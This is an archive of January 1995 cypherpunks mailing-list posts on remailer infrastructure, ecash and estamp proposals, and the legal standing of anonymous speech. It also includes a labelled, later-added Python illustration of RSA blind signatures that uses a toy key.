debt-trust?" since it is the central bank I am avoiding here.  Not
tacky tokens.)

  But it isn't really necessary.  Read on...

> [...]  There are advantages and disadvantages to that
> sort of thing, and it might be something interesting to think about, but

  One problem with getting an ecash system off the ground is making
the tokens worth money.  The advantage of a distributed web-of-
debt/trust model is that I only need to trade IOUs for US$ with a few
trusted friends.  I don't need to go to any kind of central bank.  No
central bank means no central point to be attacked with guns, hacks,
or taxes.  No central bank means no credit card numbers, money orders,
or green backs mailed away to strangers.

  Another cool thing, and the reason you don't need Chaumian digital
cash, is that the only people you can steal from (or who can steal
from you) are your trusted friends!  If I pass a bogus token in
exchange for a real IOU, then I just ripped off my friend.  The only
place two non-friends interface is at the final buyer-seller
interface.  If the seller refuses to honor the token, the buyer can
ask the friend who gave it to them for a refund, who can ask for a
refund from ... until the token gets back to the thief.  The thief can
either steal from their friend by refusing the refund, or in fact honor
the bogus token, and eat the loss (if any).

  One bad thing is anyone can deny service to people by passing bogus
tokens, and then refunding them.  Luckily the friends of the blocker
will notice that when getting tokens through that person, the number
of refunds is higher than average.  In that case, the blocker can be
removed from lists of their friends, and cut out of the economy.

  Denial of service can be prevented another way too -- but it does
require Chaumian blind signatures.  Instead of trading a Carol-IOU for
any old Jo-IOU, Carol might demand a Jo-IOU which is a signature on a
particular (blinded) secret number.  Just as if Carol were doing a
TackyToken protocol exchange directly with Jo.  If Carol gets a thing
from Pat which isn't signed by Jo, Carol complains to Pat.  If Carol
gets a thing which un-blinded isn't a signature by Jo of Carol's
secret number, Carol again complains to Pat.  Symbolically: instead of
a <-> b, then b <-> c, then ... y <-> z; do a -> via b -> via c
... via y -> z signs -> via y ... via b -> to a.  The disadvantage is
that Pr0duct Cypher's Tacky Token code would need to be hacked a bit
more.  And then there is the nasty old issue of algorithm patents.

  Noyb
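
Added example (not part of the original post, and not Pr0duct Cypher's
code): the relayed exchange described above, "a -> via b ... z signs ...
via b -> to a", using textbook RSA blinding with a constructed toy key.
The names Issuer, withdraw, relay and the extra hop Quinn are assumptions
made for illustration.

```python
import hashlib
import math
import secrets

# Constructed toy parameters: two Mersenne primes give a ~150-bit modulus.
# Far too small for real use; chosen only so the example runs instantly.
P, Q, E = 2**61 - 1, 2**89 - 1, 65537


class Issuer:
    """Jo: the party whose IOU Carol wants (the far end of the chain, 'z')."""

    def __init__(self, p=P, q=Q, e=E):
        self.n, self.e = p * q, e                  # public key
        self._d = pow(e, -1, (p - 1) * (q - 1))    # private exponent
        self.seen = []                             # everything Jo is shown

    def sign_blinded(self, blinded):
        self.seen.append(blinded)
        return pow(blinded, self._d, self.n)


def digest(secret, n):
    """Map Carol's secret number into Z_n (hash, then reduce)."""
    return int.from_bytes(hashlib.sha256(secret).digest(), "big") % n


def blind(secret, n, e):
    """Return (blinded value, blinding factor r); r must be invertible mod n."""
    while True:
        r = secrets.randbelow(n - 2) + 2
        if math.gcd(r, n) == 1:
            return (digest(secret, n) * pow(r, e, n)) % n, r


def unblind(blind_sig, r, n):
    return (blind_sig * pow(r, -1, n)) % n


def verify(secret, sig, n, e):
    return pow(sig, e, n) == digest(secret, n)


def honest(reply):
    return reply


def bogus(reply):
    """A hop that hands back something other than what the issuer signed."""
    return (reply * 2) % (P * Q)


def relay(request, hops, issuer):
    """Request travels out through every hop, the issuer signs, and the
    reply travels back through the same hops in reverse order."""
    reply = issuer.sign_blinded(request)
    for _name, on_reply in reversed(hops):
        reply = on_reply(reply)
    return reply


def withdraw(secret, hops, issuer):
    """Carol's side. Returns (token, None) on success, or (None, name of the
    friend to complain to). Carol only ever deals with her direct friend,
    hops[0]; the refund then unwinds hop by hop as in the post."""
    n, e = issuer.n, issuer.e
    blinded, r = blind(secret, n, e)
    reply = relay(blinded, hops, issuer)
    # Check 1: is the thing that came back Jo's signature on what was sent?
    if pow(reply, e, n) != blinded:
        return None, hops[0][0]
    token = unblind(reply, r, n)
    # Check 2: unblinded, is it Jo's signature on Carol's secret number?
    # (With RSA blinding this follows from check 1; it is the check that
    # any later holder of the token can repeat.)
    if not verify(secret, token, n, e):
        return None, hops[0][0]
    return token, None


if __name__ == "__main__":
    jo = Issuer()
    secret = b"carol-secret-0001"          # constructed sample value
    print(withdraw(secret, [("Pat", honest), ("Quinn", honest)], jo))
    print(withdraw(secret, [("Pat", honest), ("Quinn", bogus)], jo))
```

Jo signs only the blinded value, so neither Jo nor the hops in between
can link the finished token to Carol's request.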




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolb@barton.spring.com>
Date: Sat, 21 Jan 95 03:12:26 PST
To: Rich Lethin <lethin@ai.mit.edu>
Subject: Re: [pagre@weber.ucsd.edu: Supreme Court decision on anonymity]
In-Reply-To: <9501181647.AA13819@toast>
Message-ID: <Pine.3.89.9501210532.B7400-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks for the enlightening article.
Whenever I start the remailer, now, I won't be so afraid.

Love Always,

Carol Anne
ps It too will be on a c2.org type www page type format.

Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolb@barton.spring.com>
Date: Sat, 21 Jan 95 04:07:47 PST
To: "Timothy C. May" <tcmay@netcom.com>
Subject: Linux Remailer Volunteer (Re:The remailer crisis)
In-Reply-To: <199501191847.KAA28985@netcom15.netcom.com>
Message-ID: <Pine.3.89.9501210553.E7400-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain


<html><head>
<h1>Volunteering</h1>
</head>
<body><pre><p>
As the Tired, Poor, Project gets its next machines ready for their
next recipients, I will be able to finally upgrade to a 386, and pass
this 8088, to the next recipient down the line. (yeah!)
<blink>I would volunteer to be your pre-alpha tester</blink>.
I know that if I could run it anybody could be taught to run it. For I
would always be grateful in learning how it was done in the first place,
and will always help those farther down the line than me.
</pre><ul><p>
<li><a href="http://www.c2.org/~carolann/coffee.html">The coffee page has
some nice Cypherpunk links and Lance Cottrell's Homepage link in it</a>.
<p><h3>I would be curious to know how many of you read your mail, and
news with a browser, <a href="mailto:carolann@c2.org">Just click here,
so I can get an idea</a>. <blink>Thanks ever so much!</blink><p>
<h2><blink>Love Always,</blink><p>
Carol Anne</h2>


Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Sat, 21 Jan 95 06:51:24 PST
To: usura@replay.com (Alex de Joode)
Subject: Re: Remailers-in-a-box
In-Reply-To: <199501211209.AA07362@xs1.xs4all.nl>
Message-ID: <199501211238.GAA00767@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
>  - The entry point of a remailer is entry@remail.org, 
> 
>  - entry@remail.org has a forward file to: batch@remail.org
>
I would state this is a security breach. entry@remail.org should not
know anything about the second level re-mailers other than a method to
identify them as legitimate.
 
>  - batch@remail.org does the actual remailing, since remail.org has
>    installed some sort of MX'ing all messages that leave batch@remail.org
>    will advertise themself as nobody@expendable.org .
>
The 'client' re-mailers should be the ones to initiate the call-up, not the
entry re-mailer. This way if the portal is compromised no information can
be gained such as the list of clients. The entry re-mailer should sit there
waiting for a call. When it gets one it goes through some kind of verification
process (akin to some comments I made back in the summer relating to making
all the packets encrypted at all times).
 
>  - If you "loose" expendable.org, you simply set up a new account with
>    MX'ing, the remailer-users will only notice the change in exit-header,
>    the entry-point of that remailer is still entry@remail.org
> 
If you make the entry point anonymous and have at least two of the entry points
slaved (sorta like collision avoidance on ethernet) then the entry point never
has to change. Also if one goes down the other takes up the slack. It might
also be possible to have it route over-flow packets from the main router to the
slave router when traffic maxes out.

The reality is that the main point of attack is going to be the incoming
since if you take that one (if it is a small and simple re-mailer network)
will bring the whole system to its knees.

Take care.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 21 Jan 95 05:21:53 PST
To: owner-cypherpunks@toad.com
Subject: Re: Netherlands crypto ban?
Message-ID: <9501211317.AA00188@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


	In my opinion, The Netherlands will not adopt a crypto policy on their
	own, they'll do it if the EC proposes such a "thing". 

Several months ago at a security SIG meeting at OSF, a sr tech guy
from Shell gave a presentation and I went and spoke with him afterwards.
(Not being oblique, I just forget his name.)

Shell needs public key because they want to use email for legal contracts.
They've been waiting for standards to come around, but have given up.
They're currently planning on using NIST's DSS, if they can fix a few things:
    -	Add concepts of time and location (it can be important to prove
	that this was signed last month outside of the U.S.)
    -	Add re-signing with only minor increase in size
	If there are licensing issues, "just buy them off."
They don't like RSA because of the US licensing issues -- it's too hard to
prove you only have to pay for a small portion of your use, for example.
They like DSS because it explicitly does not support privacy, which is
problematic in France, especially.

He's reluctantly inventing this setup because the vendors haven't given him
a world-wide public key story yet.  (DCE 1.2 has/had some plans, and he wanted
to push our licensees to support it, at least.)

Interestingly, things have inverted and the EC (sorry, EU) is looking
for Shell to set a standard.  Several other large companies (Philips,
etc) are also going to follow whatever Shell does.  He thinks it'll be
de-facto standard in 18-24 months.

FYI.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joelm@eskimo.com (Joel McNamara)
Date: Sat, 21 Jan 95 08:41:38 PST
To: cypherpunks@toad.com
Subject: Remailer Crisis - Part II
Message-ID: <199501211641.AA01584@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


The "remailer-in-a-box" solution seems to be on its way to solving the
ebbing number of remailers problem.  The next step is to think of remailers
in a supply and demand context.  From a "maximizing your resources"
standpoint, it doesn't make sense to have one hundred remailers available
(aside from the chaining implications), if the usage/demand needs are met by
twenty.

It's important to create an infrastructure for a large scale remailer
network, but the next step is to actually drive demand (obvious benefits of
increasing privacy levels, blunting traffic analysis, creating a large
enough population that will vocally protest if attempts to restrict
remailers are made, etc.).

I see two ways of doing this.

The first step is education.  Net users, especially the new ones, need to be
educated about the use and benefits/limitations of remailers.  Web pages are
a good start.  The information needs to be easy to understand yet
compelling.  Users need to be shown why remailers are important and be
encouraged to at least try using them once ("want some candy little boy/girl").

The second step is access.  With the advent of commercial Internet
providers, the de facto Net access points are becoming GUI PCs and Macs.  It
is critical that tools be built for these platforms that make using
remailers a transparent and simple task.  (I don't want to belittle GUI
users, I'm using Windows as I write this, but most would rather click a few
buttons and use a list box rather than remember the :: syntax for embedding
remailer commands in their e-mail.)  This was part of my motivation for
writing Private Idaho for Windows Eudora.  I see good GUI premailers or
integrated e-mail scripts as a critical element of remailer success.

Joel McNamara
joelm@eskimo.com - finger for PGP key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Sat, 21 Jan 95 08:45:46 PST
To: cypherpunks@toad.com
Subject: Re: Data Vaults (vs. Data Havens)
In-Reply-To: <199501210713.XAA17754@netcom13.netcom.com>
Message-ID: <199501211645.IAA13329@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: tcmay@netcom.com (Timothy C. May)

   I don't think we ought to call these uses "data havens." Save the term
   "data haven" for those places, in cyberspace or in real space, that
   sell access to Nazi medical experiments, that sell illegal birth
   control information, that buy weapons secrets, and so on. 

I fully concur.  The connotations of the word "haven" imply activities
that ordinary people don't see themselves doing.  This means that
ordinary people won't generally use something called a "haven", even
if they might use exactly the same service called something else.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Sat, 21 Jan 95 08:48:34 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
In-Reply-To: <v01510103ab46516c92d0@[152.97.12.101]>
Message-ID: <199501211648.IAA13338@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)

   I thought that it was in Perl. I have tried pulling Unix Perl scripts and
   running them under MacPerl, but it doesn't quite do it. In fact, it usually
   doesn't do anything but spew errors back at you.

Perl has a lot of Unix-ism in it.  The original remailer, which was
really simple and stupid, only used stdin and stdout and pipes, ...
Oops!  Pipes may or may not be supported [well] on the Mac platform.

I suspect a port won't be particularly straightforward.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@jpunix.com>
Date: Sat, 21 Jan 95 07:00:37 PST
To: cypherpunks@toad.com
Subject: jpunix.com and MX'ing
Message-ID: <199501211459.IAA02161@jpunix.com>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Sat, 21 Jan 95 09:12:11 PST
To: cypherpunks@toad.com
Subject: Re: Remailers-in-a-box
In-Reply-To: <199501210129.AA01692@ideath.goldenbear.com>
Message-ID: <199501211711.JAA13370@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Greg Broiles <greg@ideath.goldenbear.com>

   In this model, who deals with mailbombs/spams/requests for address blocks?
   It is this sort of administrivia (plus the threat of liability) that
   makes running a remailer troublesome, not a lack of someone's $20/month.

This point is right on.

   I think it's disingenuous to say that "X pays the bills for the network
   link; X purchased the hardware and keeps it running; the box is in X's
   house/office; X is the person who reads complaint mail and responds (or
   fails to); but because Y sends X $20/month, the remailer (and attendant
   liability for its mis/use) belongs to Y."

The whole point of separation of operations and ownership is to
actually separate them.  If the computer/network service owner (X
above) is participating in any _semantically meaningful_ way in the
operation of the remailer service, then they too are part of the
remailer service.  If the computer/network service is responding to
complaint mail, or even getting properly directed complaint mail, they
are exposing themselves to participation in the remailing service.

As with liability for content, the important issue here is the state
of mind of the computer/network operator.  If they know sufficiently
many details about the nature of the remailer operation, the boundary
of separation is breached.  

Unfortunately, the standard mechanism of complaint on the internet is
the postmaster address.  Complainants do not always follow the nice
complaint instructions in the headers of email.  A remailer run out of
a shell account will have postmaster complaints addressed to the
computer/network operator rather than the remailer operator.

Therefore, a second postmaster address is required.  A second
postmaster address means another domain name.  This new domain name
can be either a subdomain or a brand new one.  I don't think it will
matter much, although a domain not related to the computer/network
operator would further the separation.

Now setting up new domain names, while pretty easy, requires the
cooperation of DNS operators.  Typically these connections have been
informal and a low barrier to entry but only if you know somebody who
does domain names.  DNS operation is not yet a separate service to
buy, but I suspect it will become so.  In the meanwhile the offers of
DNS provision by John and Strick are welcome.

   [...] I don't think that anyone - not courts,
   and not the world-in-general - is going to pay attention to that 
   formalism when it's clear that a machine essentially under the control
   of X is being used for 'antisocial' means.

As important as legal protections are, direct action against spammers
attacks the machine infrastructure directly.  A word to the wise
computer/network provider.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Sat, 21 Jan 95 09:18:48 PST
To: cypherpunks@toad.com
Subject: Re: Remailers-in-a-box
In-Reply-To: <199501210301.TAA09022@netcom14.netcom.com>
Message-ID: <199501211718.JAA13387@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: tcmay@netcom.com (Timothy C. May)

   In this model the owner of the machine (who is not himself a remailer,
   only a seller of accounts) simply ignores all such issues of
   mailbombs, spams, request for address blocks.

   [the form letter might include]
   "If you have problems, talk to the
   sender, not to me."

In order to make such a discharge anywhere near believable, you'd have
to provide a way for the complainant to get in touch with the sender.
The sender in this case is the remailer operator.  It would also be a
standard courtesy to forward the misdirected mail.

   Currently the
   remailer sites = remailer accounts, so they have little or no
   protection.

One of the services that RiaB might do well to offer is subdomaining.
It's pretty easy to direct all subdomain mail, which includes
postmaster mail, to a single email address.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Craig A. Johnston" <caj@tower.stc.housing.washington.edu>
Date: Sat, 21 Jan 95 09:39:55 PST
To: remailer-operators@c2.org
Subject: Re: jpunix.com and MX'ing
In-Reply-To: <199501211728.LAA04757@jpunix.com>
Message-ID: <199501211739.JAA00303@tower.stc.housing.washington.edu>
MIME-Version: 1.0
Content-Type: text



John A. Perry wrote:
> 
> First of all, I hope you don't mind me posting this to a couple of 
> lists as I find your questions pertinent and should be of value to many 
> readers.

Oops, I actually meant to direct it to the list myself, but forgot
to edit my headers.  Sure.

> 
> > To what extent can the operator of such a remailer really hide his
> > actual site?
> 
> 	It depends on the level of control the remailer operator has on the 
> site that the remailer operates from.

Assume root.

I know that you can set the 'masquerade as' thing in sendmail, but
of course any other SMTP agents you deal with are going to
correctly identify you when you 'HELO' and you're going to wind
up in the header, somewhere... (well, except smail 3.1, and probably
others.)  -- I'm assuming here the best one will be able to do will
be equivalent to a forgery via port 25.

--Craig





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: davidm@iconz.co.nz (David Murray)
Date: Fri, 20 Jan 95 13:22:09 PST
To: hfinney@shell.portal.com
Subject: Little ebanks -- a modest proposal.
Message-ID: <199501202120.KAA03412@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain



[Executive Summary -- The author proposes a system of stamps for remailers
as a way of starting up an ecash system. The stamps would be sold to the 
public as stamps, but be convertible by remailer operators into real money.]

Hal,

Many thanks for your comments. I'll try to make this less legalistically
impenetrable.

Despite the difficulties, I think anon corps are possible - and legal.
What I was trying to stress is that they are expensive and inefficient: so
you have to be really sure you want anonymity if you are going to use one.

The hurdles to ecash seem more formidable. The problem with moving off
shore and ignoring the SEC, for instance, is that your scheme loses some
credibility. Since the value of ecash is (in the short term, at least)
going to be based on the possibility of converting it into real cash (just
as the value of real cash is based on the possibility of converting it into
real things), a structure that operates outside the law makes that value
doubtful. A large-scale rollout of ecash for the average Netscape user (and
the people that service them) is going to need all the legitimacy it can
muster.

Perhaps, though, we can start small, and allow the forces of nature (greed,
envy and, with a bit of luck, sloth) to take their course and scale a small
scheme into a thriving e-economy.

What I have in mind is a service that provides estamps (you knew there had
to be an 'e' in there somewhere, didn't you) for use with remailers. Jo
Anonymous buys stamps, sticks them on her messages, and the anon-remailers
collect them. The remailer ops then get to cash the stamps in for actual
money, so they can pay their ISPs and lawyers.

At the heart of the scheme is a genuine (micro) ebank [a uebank?]. But, to
avoid problems with offering securities to the public (and the SEC hassles
etc), the ebank only sells estamps (little bits of ecash) to estamp-
vendors. The estamp-vendors sell the stamps (with a mark-up?) to the public.
[Perhaps using this new Netscape/Mastercard tie-in.] Because the estamp-
vendors are only selling stamps (you can tell by the beautiful stamp-like
gif-icons the vendor's Web page uses...) the SEC doesn't become involved.
[I'm relying on the fact that the numbers involved are really small, and
that the estamps *are* being sold for the purposes of postage. Perhaps 
the ebank and the vendor should be based off shore...]

This scheme breaks the credibility issue into two -- a large number of
people (anonymous remailer users) have to be convinced of something
relatively trivial (that the remailer will accept the stamps); a small
number of people (anonymous remailer operators) have to be convinced of
something relatively important (that the stamps are exchangeable for cash).
If the remailer operators are sufficiently involved in the scheme, this
should work.

One type of scalability comes when EITHER

A. Someone sets up as a Data Haven token vendor (the tokens being bought
from the ebank as slightly larger bits of ecash), and data haven operators
start to accept the Tokens, in the knowledge they can swap them for real
money;

OR

B. Data Haven operators start to accept estamps for their services, because
they can swap them for cash;

OR both.

[The first scenario obviously disguises the appearance of ecash as a medium
of exchange for a bit longer.]

Another type of scalability comes when other people start uebanks, which
then issue their own estamps/tokens/ecash to estamp/token vendors. If the 
new uebanks are as (provably) secure as the original(s), the uebanks could
agree to clear each others' ecash and settle up at the end of the day (or
some global equivalent - eg 12am GMT) using some kind of netting system.

As long as everyone played nice at the beginning (all the remailer operators
declared their estamp income etc ;-) the uebanks could go legit: and by 
backing their submissions to regulators with a proven record of service
(no need to stress that the remailers were *anonymous*), by wearing Al Gore
t-shirts and garbling about the I-way and electronic town halls, and by not
letting Tim May and his contract killers near the place, it might just work.

On the other hand, if the system is working well enough, there may be no
need to go legit. (Although if I was an ebank operator I would be wary about
entering into netting arrangements with an ebank the SEC etc could close
down). [But is netting needed with online clearing? Perhaps this would
only be useful across currencies...] With the ebanks in appropriate 
jurisdictions, operating in grey rather than obviously black areas (it
is not so much that this stuff is being offered to the public as that the
public is going out to *find* this stuff), with a proven track record in 
ponying up the cash, and with the approval of really cool people who get on 
the cover of Wired, Robin Public may not *need* any more assurance to
participate in the e-economy.

What R.P. *will* need is products. Most of the attempts at net-commerce I've
seen concentrate on offering things that can be delivered to people, either
physically (so that the Compuserve Electronic Mall is basically a mail order
catalogue) or electronically (hence the rather sketchy descriptions of 
anonymous markets, usually falling back on the idea that, because this is
the Information Age, consulting is the root of all value...), to be consumed
now (this tin of coffee, that movie-on-demand, the other set of nanotech
plans).

But of course a lot of people (not, unfortunately, myself :-) have
significant amounts of property that they do not consume right away. The
possibility of anonymous investment (through eg anon corps) offers huge 
scope for the development of the e-economy. [I'll mention one statistic -- 
according to tax haven experts (Ginsberg, Spitz), in 1989 50% of all money
processed internationally goes through tax havens.] After all, a capitalist
economy (even an anarcho-capitalist economy) is built by capitalists, not
wage slaves.

More later (unless you plead real hard...)

Cheers,

David





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sat, 21 Jan 95 10:47:17 PST
To: nzook@bga.com (Nathan Zook)
Subject: Re: Supreme Court on Anonymous Bills
In-Reply-To: <Pine.3.89.9501211257.D14968-0100000@lia.bga.com>
Message-ID: <199501211846.KAA11212@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Nathan Zook wrote:

> There can be little question that any attacks on remailers and civilian
> strong crypto will face challenges on the basis of Free Speech and Equal
> Protection.  The question is: can the state show compelling interest?  I
> believe that it can.  Anonymous agents, by their very nature, are immune
> from state restraint.  Since our entire legal system centers around state
> restraint, I believe that Free Speech and Equal Protection will fall to the
> four horsemen.

But mail and messages from "foreigners" is also "immune from state
restraint," and yet we haven't seen either a ban on mail from outside
the U.S. or a requirement that such mail be inspected, identified,
etc.

(I'm not sure if your line "our entire legal system centers around
state restraint" refers to state constraint of citizens, as you seem
to imply in your conclusion, or constraint _of_ the state, as the
Constitution seems to imply.)

Likewise, if I receive a letter, open it, and find a request to remail
it to another address, isn't this equivalent to our remailers? Does
this imply a compelling State need to open all mail?

Does the plotting of various crimes in private homes imply a
compelling State need to place microphones and video cameras in such
places?

Clearly not, so I don't think the privacy of e-mail will soon be
breached just because there are some abuses in some people's minds.

> There is the general question of political speech.  Unfortunately, there is
> little anonymous _US_ political speech.  Furthermore, sedition is a crime,
....
> I believe, therefore, that both the court and the dissent bode poorly for
> anonymous encrypted mail.

But anonymous handbills are quite common, posted all over the place
here in my home town, and the Supreme Court ruled quite properly that
identities are not required for speech. Likewise, radio call-in shows
are dominated by anonymous call-ins.

Ditto for "Name Withheld by Request" letters to the editor, etc.

Lots of speech is not anonymous, because Congresscritters are
identified, because Rush Limbaugh obviously _wants_ his name
publicized, because I want my name attached to my views, etc. But not
because there's any law saying political speech cannot be anonymous.

Quite the contrary.

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sat, 21 Jan 95 15:40:55 PST
To: cypherpunks@toad.com
Subject: Locksmith's Guild wants limit on free speech
Message-ID: <199501211859.KAA12413@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



This is just an informal pointer, as I don't have the energy right now
to track down quotes, official positions, etc.

Check out comp.org.eff.talk for discussion of how "professional
locksmiths" are angry that "amateur locksmiths" (unlicensed, not real
members of the Brotherhood) are using the Net to disseminate and
discuss the Secret and Most Arcane Knowledge of the Guild.

And alt.locksmithing is carrying the stuff.

This is just one of several recent examples where a controversy is
developing. 

I have often likened the end of the medieval guilds to our current
situation. In 1300 A.D., the "Blacksmith's Guild" owned and controlled
the knowledge of blacksmithing, enforced by the Crown. Apprentices
were Initiates, and I have little doubt that attempts to "steal"
this knowledge were dealt with harshly, probably fatally.

This "intellectual property law" of its time was rendered moot when
books became economical. The first books published after Gutenberg
were religious in nature--Bibles and hymnals, etc. Then came "How To"
books, the destroyers of the Guilds.

Crypto and remailers are going to do the same thing to today's
versions of guilds, what we call "licensed professions."

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@jpunix.com>
Date: Sat, 21 Jan 95 09:30:25 PST
To: "Craig A. Johnston" <caj@tower.stc.housing.washington.edu>
Subject: Re: jpunix.com and MX'ing
In-Reply-To: <199501211637.IAA00183@tower.stc.housing.washington.edu>
Message-ID: <199501211728.LAA04757@jpunix.com>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Sat, 21 Jan 95 10:17:49 PST
To: cypherpunks@toad.com
Subject: Supreme Court on Anonymous Bills
Message-ID: <Pine.3.89.9501211257.D14968-0100000@lia.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


$.02 (fiat) on Talley v California  (recently posted here)
 
It is important to note that this court is expected to significantly
reverse some of the landmark cases from the Warren era.  We should,
therefore, look to the dissent at least as much as to the court.
 
There can be little question that any attacks on remailers and civilian
strong crypto will face challenges on the basis of Free Speech and Equal
Protection.  The question is: can the state show compelling interest?  I
believe that it can.  Anonymous agents, by their very nature, are immune
from state restraint.  Since our entire legal system centers around state
restraint, I believe that Free Speech and Equal Protection will fall to the
four horsemen.
 
When we consider the decision, we note that one of the main reasons for
voiding the ordinance on its face was that there were other remedies to the
problems that the ordinance claimed to address.  No such other remedies
will exist in our case, that being part of the point of our systems.
Considering the dissent, we see even more room, with the question of Equal
Protection might not be extended on the basis that only electronic
communications were hampered.
 
There is the general question of political speech.  Unfortunately, there is
little anonymous _US_ political speech.  Furthermore, sedition is a crime,
and if the Founding Fathers printed the same things against our government
that they did against England (they could do more), they would face a
number of criminal charges.
 
 
I believe, therefore, that both the court and the dissent bode poorly for
anonymous encrypted mail.
 
 
But these are not the only arguments we have.  We have the questions of
Enforceability, Distinguishability, Privacy, and the Right to Bear Arms.
One may argue with some force that it may be impossible to determine if a
person is sending and receiving information (and requests for information)
directly, or if they are acting as an anonymizing agent.  One may argue
with great force this difficulty, combined with the nature of the InterNet,
would make general enforcement impossible--leading to the same type of
failure as the Prohibition.  One may argue forcibly that the tools
necessary to allow anonymous encrypted traffic are the tools necessary to
preserve the barest elements of privacy.  Finally, since strong crypto has
been ITAR limited, one may argue that the tools required are militia-type
weapons, and as such, protected Arms.
 
 
Finger or request keyserver for PGP 2.6.2 (tm) key.
PGP<->Mail/News installation incomplete.
 
Factors for modulus are not proven primes.  Key may be far weaker than
expected.  Encode at your own risk.
 
Key ID: 14712B4D 1994/12/26 Nathan H. Zook <nzook@bga.com>
Key fingerprint =  44 B3 D8 66 3D 55 1E 2E  F8 92 22 A6 33 8C DE 24 
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mikepb@freke.lerctr.org (Michael P. Brininstool)
Date: Sat, 21 Jan 95 05:11:27 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
In-Reply-To: <FR69yc1w165w@vox.xs4all.nl>
Message-ID: <1995Jan21.043051.5142@freke.lerctr.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <FR69yc1w165w@vox.xs4all.nl> usura@vox.xs4all.nl (Alex de Joode) writes:
>jalicqui@prairienet.org (Jeff Licquia) writes:
>
>: Would it be better if you didn't have to dedicate your box to Linux, but
>: just ran it every so often when you weren't playing with Codewright?  If you
>: had some store-and-forward mail system (like UUCP or Fido), you wouldn't
>: need to say goodbye to DOS/Windows.
>
>Patrick Oonk <kafka@xs4all.nl> has written a remailer for Waffle,
>(which is an UUCP system), I use that for vox.xs4ll.nl . It works
>under DOS. 

I wouldn't mind hosting a remailer, but I am two UUCP hops off the net.
Does someone want to give me a San Jose area UUCP account directly to an
internet system?  An MX record holder would be nice.  My current domain
master is in Dallas, so mail to my machine actually goes through 4 UUCP
hops before it gets to me.  I want to get my own domain and get closer to
the net.

---------------------------------------------------------|
| #include "std/disclaimer.h"     Michael P. Brininstool |
| mikepb@freke.lerctr.org      OR      mikepb@netcom.com |
|---------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
